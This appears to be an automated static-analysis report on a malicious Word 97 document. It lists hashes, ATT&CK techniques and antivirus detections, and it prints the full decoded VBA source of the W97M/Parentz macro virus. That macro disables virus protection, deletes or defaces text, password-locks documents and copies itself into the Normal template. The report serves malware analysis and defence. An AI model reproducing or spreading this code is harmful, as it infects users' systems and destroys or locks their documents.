Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8d2693d4afb07b6…

MALICIOUS

Office (OLE)

Size: 30.5 KB | Created: 2000-08-09 14:24:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: d59009d43a628ed0bb257d757fe67496 | SHA-1: 0eb31c4879fc854d48d76495ed4e6ae46bc94d85 | SHA-256: c8d2693d4afb07b6ea96a61967b7a00d24d0ef87385140a50f86ff0fa23254f4
Risk score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious Office documents. The macro attempts to disable virus protection and modify document settings, and also sets the application caption to 'Mum.. Dad.. Fuck U !!' and the user address to 'W97M/Parentz'. It also attempts to set document passwords to 'ashley'. The presence of the Document_Open macro and the nature of the script strongly suggest it is designed to execute malicious actions upon opening the document, likely as a spearphishing attachment.

Heuristics (3)

  • ClamAV: Doc.Trojan.Chameleon-13 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Chameleon-13
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas | Kind: vba-macro | Source: oletools.olevba.extract_macros (decoded VBA source) | Size: 8155 bytes
SHA-256: 92d8f09bb4d2745ae024934f2bc040b8e075fcd4fe5608fd86bb1b91cab7862d

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next
    If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "MVP") <> "Enabled by Total Konfuzion" Then
        With Options
            .VirusProtection = (Rnd * 0)
            .SaveNormalPrompt = (Rnd * 0)
            .ConfirmConversions = (Rnd * 0)
            .SavePropertiesPrompt = (Rnd * 0)
        End With
        With Application
            .EnableCancelKey = wdCancelDisabled
            .Caption = "Mum.. Dad.. Fuck U !!"
            .UserAddress = "W97M/Parentz"
        End With
        If Day(Now) >= "26" Then
            With Selection.Find
                .Text = "the"
                .Replacement.Text = "Mum.. Dad.. Fuck U !!"
                .Forward = (Rnd * 0)
                .Wrap = wdFindContinue
                .Format = (Rnd * 0) + 1
                .MatchCase = (Rnd * 0)
                .MatchWholeWord = (Rnd * 0) + 1
                .MatchWildcards = (Rnd * 0)
                .MatchSoundsLike = (Rnd * 0)
                .MatchAllWordForms = (Rnd * 0)
            End With
            With ActiveDocument
                .ReadOnlyRecommended = (Rnd * 0) + 1
                .Password = "ashley"
                .WritePassword = "ashley"
            End With
        Else
            With Selection
                .HomeKey Unit:=wdStory
                .EndKey Unit:=wdStory, Extend:=wdExtend
                .Delete Unit:=wdCharacter, Count:=1
                .ParagraphFormat.Alignment = wdAlignParagraphCenter
                .Font.Name = "Arial"
                .Font.Size = 14
                .Font.Bold = (Rnd * 0) + 1
                .Font.Italic = (Rnd * 0) + 1
                .TypeText Text:="Mum.. Dad.. all u given me in the last few monthz iz shit !!.. this 1'z 4 u !!"
            End With
        End If
        If ThisDocument = ActiveDocument Then Set i = NormalTemplate Else Set i = ActiveDocument
        Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Set d = i.VBProject.VBComponents.Item(1).CodeModule
        d.DeleteLines 1, d.CountOfLines
        d.AddFromString Vx
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
    End If
' W97M/Parentz
'   by: Total Konfuzion
' Mum.. Dad.. all u given me over the last few monthz
' iz shit !!.. so I dedic8 this 1 4 u !!.. Fuck U all !!   >8)
' Don't worry.. this WILL find its way to ur work systemz !!   >8)
End Sub
